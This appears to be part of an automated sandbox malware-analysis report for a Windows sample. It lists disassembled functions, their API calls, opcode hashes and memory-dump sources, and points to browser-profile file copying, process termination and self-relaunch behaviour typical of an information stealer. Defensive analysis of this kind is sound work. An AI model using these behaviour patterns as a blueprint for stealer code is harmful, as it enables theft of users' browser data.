                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                              • String ID:
                                              • API String ID: 938513278-0
                                              • Opcode ID: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
                                              • Instruction ID: a8870cd423b2bdebac2405c4781deff9d41b4be8c630f17b409d6c798e0214d2
                                              • Opcode Fuzzy Hash: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
                                              • Instruction Fuzzy Hash: 7AF01231A017109AEA25FBBC9845B5D77A06F007A9F110B19DC04EA1F0DAA47541EE9B
                                              Function 004168D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
                                              • ExitProcess.KERNEL32 ref: 004169F5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                              • String ID: <
                                              • API String ID: 1148417306-4251816714
                                              • Opcode ID: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
                                              • Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
                                              • Opcode Fuzzy Hash: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
                                              • Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69
                                              Function 04856B37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 04856B6A
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 04856C2D
                                              • ExitProcess.KERNEL32 ref: 04856C5C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                              • String ID: <
                                              • API String ID: 1148417306-4251816714
                                              • Opcode ID: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                              • Instruction ID: e3bed76576d00ede102a6939e7ca644e9185e350c55b1dcc53b99297accc5400
                                              • Opcode Fuzzy Hash: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                              • Instruction Fuzzy Hash: ED312CB1C01218ABEB58EB94DC90FEDB778AF58304F404689E605B71A0DFB46B48CF55
                                              Function 00418EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                              • HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                              • wsprintfW.USER32 ref: 00418F08
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocProcesswsprintf
                                              • String ID: %hs
                                              • API String ID: 659108358-2783943728
                                              • Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                              • Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
                                              • Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                              • Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96
                                              Function 0040A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
                                              • lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
                                              • lstrlenA.KERNEL32(00000000), ref: 0040ADEC
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040AE73
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                              • String ID:
                                              • API String ID: 257331557-0
                                              • Opcode ID: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
                                              • Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
                                              • Opcode Fuzzy Hash: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
                                              • Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A
                                              Function 0484ABF7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0484AC78
                                              • lstrlen.KERNEL32(00000000,00000000), ref: 0484AD96
                                              • lstrlen.KERNEL32(00000000), ref: 0484B053
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 0484A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0484A7E4
                                              • DeleteFileA.KERNEL32(00000000), ref: 0484B0DA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                              • String ID:
                                              • API String ID: 257331557-0
                                              • Opcode ID: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                              • Instruction ID: bd83713bfe31552b5a405513a86b5fd417d21d1ccd2f13918a7429de7f9531ea
                                              • Opcode Fuzzy Hash: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                              • Instruction Fuzzy Hash: F8E1B672D001189ADB5DFBA8DC90DEE7339AF54205F504B59E916B60A0EFB07A4CCB61
                                              Function 0040D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
                                              • lstrlenA.KERNEL32(00000000), ref: 0040D798
                                              • lstrlenA.KERNEL32(00000000), ref: 0040D7AC
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D82B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
                                              • Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
                                              • Opcode Fuzzy Hash: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
                                              • Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A
                                              Function 0484D767 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0484D7E8
                                              • lstrlen.KERNEL32(00000000), ref: 0484D9FF
                                              • lstrlen.KERNEL32(00000000), ref: 0484DA13
                                              • DeleteFileA.KERNEL32(00000000), ref: 0484DA92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                              • Instruction ID: 8d228ac00a7133ba15f76ee5de4e63015de00245f7eb0561e4100d6c0c9bc79f
                                              • Opcode Fuzzy Hash: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                              • Instruction Fuzzy Hash: 6591D471D001189BDB1CFBA8DC94EEE7335AF54205F504B69E916F60A0EFB47A48CB62
                                              Function 0040D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
                                              • lstrlenA.KERNEL32(00000000), ref: 0040DA9F
                                              • lstrlenA.KERNEL32(00000000), ref: 0040DAB3
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040DB32
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
                                              • Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
                                              • Opcode Fuzzy Hash: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
                                              • Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A
                                              Function 0484DAE7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0484DB68
                                              • lstrlen.KERNEL32(00000000), ref: 0484DD06
                                              • lstrlen.KERNEL32(00000000), ref: 0484DD1A
                                              • DeleteFileA.KERNEL32(00000000), ref: 0484DD99
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                              • Instruction ID: 0f900b423e2b42637114abc4b693649422fb891a3ddec98ddfce738a8aae37e8
                                              • Opcode Fuzzy Hash: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                              • Instruction Fuzzy Hash: E381C571D101189BDB1CFBA8DC94DEE7335AF54209F504B69E916E60B0EFB47A08CB62
                                              Function 048BF33E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AdjustPointer
                                              • String ID:
                                              • API String ID: 1740715915-0
                                              • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                              • Instruction ID: 28add361e2a9cf4593a389e6c75f23d2bc3fed63c3fb9df6c115748677489d67
                                              • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                              • Instruction Fuzzy Hash: 27519A72600206AFEB29DF58DC40AEA77A5EB44314F148A2DEB85D6390E771B841CBD1
                                              Function 0040F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
                                              • lstrlenA.KERNEL32(00000000), ref: 0040F66B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                              • String ID: ^userContextId=4294967295$moz-extension+++
                                              • API String ID: 998311485-3310892237
                                              • Opcode ID: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
                                              • Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
                                              • Opcode Fuzzy Hash: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
                                              • Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A
                                              Function 00419660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 0041967B
                                                • Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                                • Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                                • Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08
                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
                                              • CloseHandle.KERNEL32(00000000), ref: 00419766
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                              • String ID:
                                              • API String ID: 396451647-0
                                              • Opcode ID: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                              • Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
                                              • Opcode Fuzzy Hash: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                              • Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56
                                              Function 048598C7 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 048598E2
                                                • Part of subcall function 04859147: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,04859915,00000000), ref: 04859152
                                                • Part of subcall function 04859147: RtlAllocateHeap.NTDLL(00000000), ref: 04859159
                                                • Part of subcall function 04859147: wsprintfW.USER32 ref: 0485916F
                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 048599A2
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 048599C0
                                              • CloseHandle.KERNEL32(00000000), ref: 048599CD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                              • String ID:
                                              • API String ID: 3729781310-0
                                              • Opcode ID: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
